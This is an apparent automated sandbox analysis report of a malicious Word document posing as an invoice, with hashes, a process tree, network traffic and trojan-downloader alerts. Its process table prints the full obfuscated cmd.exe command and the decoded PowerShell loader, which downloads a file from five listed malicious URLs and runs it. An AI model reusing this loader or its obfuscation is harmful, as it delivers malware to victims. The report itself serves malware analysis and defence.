File name: | Invoice-for-you |
Full analysis: | https://app.any.run/tasks/44b556c9-a4c5-40ff-9623-424c4abd4042 |
Verdict: | Malicious activity |
Analysis date: | December 14, 2018, 02:41:08 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Dec 12 13:34:00 2018, Last Saved Time/Date: Wed Dec 12 13:34:00 2018, Number of Pages: 1, Number of Words: 7, Number of Characters: 41, Security: 0 |
MD5: | C654E96E9003BC6814E01CE99943B9CE |
SHA1: | 9D16F5EC86E72993345E102880437565AF56646C |
SHA256: | 3C1D190568C82A0D672B5531E6393DCBF634977AFCD9D34669BECB22768A6A6D |
SSDEEP: | 768:yeuVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBx5E9ea3kJq2sZGBykKgonwZbn0J:6ocn1kp59gxBK85fBxYrfgC+a9 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 47 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 41 |
Words: | 7 |
Pages: | 1 |
ModifyDate: | 2018:12:12 13:34:00 |
CreateDate: | 2018:12:12 13:34:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2728 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Invoice-for-you.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2904 | c:\OCYqjbwNzVpmJ\aIVVTSHjkfj\IGbdvsT\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set CgY=dscMnuEaOzRvjORbUviKEkuSUEdIVpWiwCSq-'F$AxrG@9t51Hl8}7=By:.g6oN,+TZLe(h /\4m;{f)0D&&for %x in (39,21,65,30,54,37,2,2,67,37,76,39,32,55,7,54,4,68,32,36,61,15,12,68,2,46,71,62,68,46,58,30,68,15,33,50,31,68,4,46,76,39,55,34,32,54,37,70,46,46,29,57,72,72,1,29,7,26,68,1,26,68,1,31,59,4,58,2,7,72,7,66,42,44,70,46,46,29,57,72,72,1,46,7,4,1,75,7,50,50,9,58,2,61,75,72,9,45,74,74,15,43,22,44,70,46,46,29,57,72,72,46,68,1,46,58,15,42,31,59,70,46,1,21,56,75,7,42,21,68,46,31,4,59,58,2,61,75,72,32,29,36,31,4,2,50,22,26,68,1,72,74,35,30,56,60,44,70,46,46,29,57,72,72,1,78,80,45,15,26,58,2,61,75,72,61,53,65,43,34,44,70,46,46,29,57,72,72,42,68,2,68,29,46,31,21,22,70,31,4,12,7,58,41,56,9,72,48,2,4,74,29,37,58,34,29,50,31,46,69,37,44,37,79,76,39,4,43,61,54,37,65,49,40,37,76,39,66,9,12,71,54,71,37,51,45,47,37,76,39,2,14,12,54,37,33,65,33,37,76,39,49,38,27,54,39,68,4,17,57,46,68,75,29,64,37,73,37,64,39,66,9,12,64,37,58,68,41,68,37,76,78,61,42,68,7,2,70,69,39,12,75,31,71,31,4,71,39,55,34,32,79,77,46,42,56,77,39,32,55,7,58,81,61,32,4,50,61,7,26,38,31,50,68,69,39,12,75,31,63,71,39,49,38,27,79,76,39,13,9,30,54,37,26,19,32,37,76,27,78,71,69,69,43,68,46,36,27,46,68,75,71,39,49,38,27,79,58,50,68,4,59,46,70,71,36,59,68,71,51,80,80,80,80,79,71,77,27,4,17,61,21,68,36,27,46,68,75,71,39,49,38,27,76,39,19,26,26,54,37,28,9,66,37,76,15,42,68,7,21,76,52,52,2,7,46,2,70,77,52,52,39,78,13,66,54,37,62,9,40,37,76,88)do set GW=!GW!!CgY:~%x,1!&&if %x gtr 87 powershell "!GW:~-452!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3460 | CmD /V/C"set CgY=dscMnuEaOzRvjORbUviKEkuSUEdIVpWiwCSq-'F$AxrG@9t51Hl8}7=By:.g6oN,+TZLe(h /\4m;{f)0D&&for %x in (39,21,65,30,54,37,2,2,67,37,76,39,32,55,7,54,4,68,32,36,61,15,12,68,2,46,71,62,68,46,58,30,68,15,33,50,31,68,4,46,76,39,55,34,32,54,37,70,46,46,29,57,72,72,1,29,7,26,68,1,26,68,1,31,59,4,58,2,7,72,7,66,42,44,70,46,46,29,57,72,72,1,46,7,4,1,75,7,50,50,9,58,2,61,75,72,9,45,74,74,15,43,22,44,70,46,46,29,57,72,72,46,68,1,46,58,15,42,31,59,70,46,1,21,56,75,7,42,21,68,46,31,4,59,58,2,61,75,72,32,29,36,31,4,2,50,22,26,68,1,72,74,35,30,56,60,44,70,46,46,29,57,72,72,1,78,80,45,15,26,58,2,61,75,72,61,53,65,43,34,44,70,46,46,29,57,72,72,42,68,2,68,29,46,31,21,22,70,31,4,12,7,58,41,56,9,72,48,2,4,74,29,37,58,34,29,50,31,46,69,37,44,37,79,76,39,4,43,61,54,37,65,49,40,37,76,39,66,9,12,71,54,71,37,51,45,47,37,76,39,2,14,12,54,37,33,65,33,37,76,39,49,38,27,54,39,68,4,17,57,46,68,75,29,64,37,73,37,64,39,66,9,12,64,37,58,68,41,68,37,76,78,61,42,68,7,2,70,69,39,12,75,31,71,31,4,71,39,55,34,32,79,77,46,42,56,77,39,32,55,7,58,81,61,32,4,50,61,7,26,38,31,50,68,69,39,12,75,31,63,71,39,49,38,27,79,76,39,13,9,30,54,37,26,19,32,37,76,27,78,71,69,69,43,68,46,36,27,46,68,75,71,39,49,38,27,79,58,50,68,4,59,46,70,71,36,59,68,71,51,80,80,80,80,79,71,77,27,4,17,61,21,68,36,27,46,68,75,71,39,49,38,27,76,39,19,26,26,54,37,28,9,66,37,76,15,42,68,7,21,76,52,52,2,7,46,2,70,77,52,52,39,78,13,66,54,37,62,9,40,37,76,88)do set GW=!GW!!CgY:~%x,1!&&if %x gtr 87 powershell "!GW:~-452!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3356 | powershell "$kTW='ccL';$wBa=new-object Net.WebClient;$BSw='http://spadesdesign.ca/aZr@http://stansmallz.com/z944bGu@http://test.brightskymarketing.com/wp-includes/4qWy6@http://sf09bd.com/o7TGS@http://receptikuhinja.xyz/1cn4p'.Split('@');$nGo='THA';$Zzj = '895';$cRj='CTC';$HFI=$env:temp+'\'+$Zzj+'.exe';foreach($jmi in $BSw){try{$wBa.DownloadFile($jmi, $HFI);$OzW='dKw';If ((Get-Item $HFI).length -ge 80000) {Invoke-Item $HFI;$Kdd='VzZ';break;}}catch{}}$fOZ='NzA';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2728 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR93C7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2728 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DC187BC.wmf | — | |
MD5:— | SHA256:— | |||
2728 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\56C3912A.wmf | — | |
MD5:— | SHA256:— | |||
3356 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D1HVFA1B95S7PSB3KWRB.temp | — | |
MD5:— | SHA256:— | |||
3356 | powershell.exe | C:\Users\admin\AppData\Local\Temp\895.exe | — | |
MD5:— | SHA256:— | |||
3356 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13a183.TMP | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
3356 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
2728 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B044CC8D.wmf | wmf | |
MD5:CA3846623A19CBCEDDA8AA94B3B3C129 | SHA256:C49BC7B0F0D99DCCA1B19DD1FD8F247206ECECFAB089444A1903C1613D596444 | |||
2728 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$voice-for-you.doc | pgc | |
MD5:7FF188EE6942265D547BFB32FC48155B | SHA256:66B00A04F0E789E074EE9AF89A2D5FA1B3603DFAACB82BDA73713E97F9A66170 | |||
2728 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:0B2D0CD40E3C9E0A0DCCC1100F73E7EF | SHA256:7A82A2368A73F82F5A486D0E1CF66979E62A66EFB844D5B4F5F0A6429AA1A1B0 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3356 | powershell.exe | GET | 200 | 209.205.201.162:80 | http://stansmallz.com/z944bGu/ | US | — | — | malicious |
3356 | powershell.exe | GET | 404 | 173.249.26.84:80 | http://sf09bd.com/o7TGS | US | html | 203 b | malicious |
3356 | powershell.exe | GET | 301 | 209.205.201.162:80 | http://stansmallz.com/z944bGu | US | html | 238 b | malicious |
3356 | powershell.exe | GET | 302 | 46.4.70.106:80 | http://receptikuhinja.xyz/1cn4p | DE | html | 235 b | malicious |
3356 | powershell.exe | GET | 200 | 185.38.44.163:80 | http://test.brightskymarketing.com/cgi-sys/suspendedpage.cgi | GB | html | 7.43 Kb | malicious |
3356 | powershell.exe | GET | 302 | 185.38.44.163:80 | http://test.brightskymarketing.com/wp-includes/4qWy6 | GB | html | 593 b | malicious |
3356 | powershell.exe | GET | 200 | 46.4.70.106:80 | http://receptikuhinja.xyz/cgi-sys/suspendedpage.cgi | DE | html | 7.39 Kb | malicious |
3356 | powershell.exe | GET | 301 | 209.188.91.10:80 | http://spadesdesign.ca/aZr | US | html | 235 b | malicious |
3356 | powershell.exe | GET | 200 | 209.188.91.10:80 | http://spadesdesign.ca/aZr/ | US | html | 235 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3356 | powershell.exe | 209.205.201.162:80 | stansmallz.com | 24 SHELLS | US | malicious |
3356 | powershell.exe | 185.38.44.163:80 | test.brightskymarketing.com | HostDime.com, Inc. | GB | malicious |
3356 | powershell.exe | 173.249.26.84:80 | sf09bd.com | Contabo GmbH | US | malicious |
3356 | powershell.exe | 46.4.70.106:80 | receptikuhinja.xyz | Hetzner Online GmbH | DE | malicious |
3356 | powershell.exe | 209.188.91.10:80 | spadesdesign.ca | Liquid Web, L.L.C | US | malicious |
Domain | IP | Reputation |
---|---|---|
spadesdesign.ca |
| malicious |
stansmallz.com |
| malicious |
test.brightskymarketing.com |
| malicious |
sf09bd.com |
| malicious |
receptikuhinja.xyz |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3356 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3356 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3356 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious redirect to 'suspendedpage.cgi' |
3356 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3356 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3356 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious redirect to 'suspendedpage.cgi' |